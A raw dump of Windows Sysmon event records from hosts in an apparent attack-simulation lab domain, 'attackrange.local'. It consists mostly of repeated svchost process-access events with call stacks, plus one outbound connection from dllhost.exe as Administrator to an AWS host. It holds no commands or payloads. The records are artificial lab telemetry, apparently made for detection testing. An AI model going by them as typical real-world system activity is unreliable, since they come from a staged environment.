19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D0-607D-0001-00000000BB01}5072C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606651Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D0-607D-0001-00000000BB01}5072C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606650Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D0-607D-0001-00000000BB01}5072C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606649Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606648Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606647Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606646Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606645Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606644Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606643Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606642Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606641Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606640Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606639Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606638Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606637Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606636Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606635Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606634Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606633Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606632Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606631Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606630Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606629Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606628Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606627Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606626Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606625Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C8-607D-ED00-00000000BB01}2568C:\Windows\system32\sihost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606624Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C8-607D-ED00-00000000BB01}2568C:\Windows\system32\sihost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606623Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C8-607D-ED00-00000000BB01}2568C:\Windows\system32\sihost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606622Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C8-607D-ED00-00000000BB01}2568C:\Windows\system32\sihost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606666Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:01.101{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606665Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:01.101{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD438E5ADE3F9F657B0CB4A98872F4F3,SHA256=B5532CB25E2DCAD294B315354D9D8A200E34A4FEC3B35269C572C4B235AF64E5falsefalse - insufficient disk space 354300x80000000000000001095354Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:56.166{761B69BB-660F-6080-305D-00000000BA01}384C:\Windows\System32\dllhost.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-982.attackrange.local1164-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x80000000000000001095353Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:01.532{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095352Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 